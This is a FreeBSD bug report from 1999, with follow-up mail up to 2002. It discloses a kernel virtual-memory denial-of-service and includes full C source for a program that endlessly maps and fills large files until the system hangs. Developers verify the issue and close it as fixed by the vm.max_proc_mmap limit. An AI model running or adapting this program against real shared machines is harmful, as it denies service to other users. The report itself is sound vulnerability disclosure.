From nobody@FreeBSD.ORG Sat Oct 30 16:00:46 1999
Return-Path: <nobody@FreeBSD.ORG>
Received: by hub.freebsd.org (Postfix, from userid 32767)
	id F0D8014BF2; Sat, 30 Oct 1999 16:00:45 -0700 (PDT)
Message-Id: <19991030230045.F0D8014BF2@hub.freebsd.org>
Date: Sat, 30 Oct 1999 16:00:45 -0700 (PDT)
From: sobomax@altavista.net
Sender: nobody@FreeBSD.ORG
To: freebsd-gnats-submit@freebsd.org
Subject: VM DoS attack (with exploit attached)
X-Send-Pr-Version: www-1.0

>Number:         14614
>Category:       kern
>Synopsis:       VM DoS attack (with exploit attached)
>Confidential:   no
>Severity:       critical
>Priority:       high
>Responsible:    dillon
>State:          closed
>Quarter:        
>Keywords:       
>Date-Required:  
>Class:          sw-bug
>Submitter-Id:   current-users
>Arrival-Date:   Sat Oct 30 16:10:00 PDT 1999
>Closed-Date:    Wed Mar 20 10:46:07 PST 2002
>Last-Modified:  Wed Mar 20 10:50:01 PST 2002
>Originator:     Maxim Sobolev
>Release:        4.0-CURRENT, 3.3-STABLE
>Organization:
Vega International Capital
>Environment:
>Description:
Any unpriveleged user with shell access and 10-20MB of disk quiota
can hang FreeBSD machine using following program. This program is simply 
mmap'ing large files without unmap'ing them. I have not found a way to
prevent this attack neither using disk quotas nor using memory limits in
login.conf.

I'm personally tested it works on 4.0, however others reports that 3.3
is also affected.
>How-To-Repeat:
#include <sys/types.h>
#include <sys/mman.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>

main()
{
    int fd;
    int i;
    int len=1024*1024*10;  /*ie 10Mbytes*/
    caddr_t addr;
    char ttt[80];

    for (i=0;;i++)
    {
    sprintf (ttt,"%d",i);
    fd=open(ttt,O_CREAT|O_RDWR,0666);
    if (fd<0)
    {
        printf("open error %ld\n",errno);
        exit(1);
    }
    lseek(fd,len-1,SEEK_SET);
    write(fd,"",1);
    addr=mmap(0,len,PROT_READ|PROT_WRITE,MAP_SHARED,fd,0);
    if (addr==MAP_FAILED)
    {
        printf("mmap error %ld",errno);
        exit(1);
    }
    close(fd);
    memset(addr,'x',len);
    }
}

>Fix:


>Release-Note:
>Audit-Trail:
Responsible-Changed-From-To: freebsd-bugs->dillon 
Responsible-Changed-By: kris 
Responsible-Changed-When: Sun Jun 25 23:12:22 PDT 2000 
Responsible-Changed-Why:  
Verified this does do something nasty even with resource limits in 
place (I was seeing what seemed to be a held inode lock in the kernel) 
I also had pagedaemon going crazy when I ran this on an MFS. 

From: Hiten Pandya <hitmaster2k@yahoo.com>
To: bug-followup@FreeBSD.org
Cc: dillon@FreeBSD.org, sobomax@FreeBSD.org
Subject: Re: kern/14614: VM DoS attack (with exploit attached)
Date: Wed, 20 Mar 2002 07:36:12 -0800 (PST)

 Is this issue solved?
 
   -- Hiten
   -- <hiten@uk.FreeBSD.org>
 
 __________________________________________________
 Do You Yahoo!?
 Yahoo! Sports - live college hoops coverage
 http://sports.yahoo.com/
State-Changed-From-To: open->closed 
State-Changed-By: dillon 
State-Changed-When: Wed Mar 20 10:44:45 PST 2002 
State-Changed-Why:  
This bug was fixed in Feb 2000 (2 years ago).  We now limit the number of 
tracking structures the kernel is able to allocate on behalf of any single 
process via the vm.max_proc_mmap sysctl. 

http://www.freebsd.org/cgi/query-pr.cgi?pr=14614 

From: Matthew Dillon <dillon@apollo.backplane.com>
To: Hiten Pandya <hitmaster2k@yahoo.com>
Cc: bug-followup@FreeBSD.ORG, sobomax@FreeBSD.ORG
Subject: Re: kern/14614: VM DoS attack (with exploit attached)
Date: Wed, 20 Mar 2002 10:45:03 -0800 (PST)

 :Is this issue solved?
 :
 :  -- Hiten
 :  -- <hiten@uk.FreeBSD.org>
 :
 :__________________________________________________
 :Do You Yahoo!?
 :Yahoo! Sports - live college hoops coverage
 :http://sports.yahoo.com/
 
     I'll close the ticket.  It was fixed in February 2000 (two years ago).
     We now have a vm.max_proc_mmap sysctl that limits the number of 
     vm_map_entry structures the kernel is allowed to allocate on behalf of
     a process.
 
 					-Matt
 					Matthew Dillon 
 					<dillon@backplane.com>
>Unformatted:
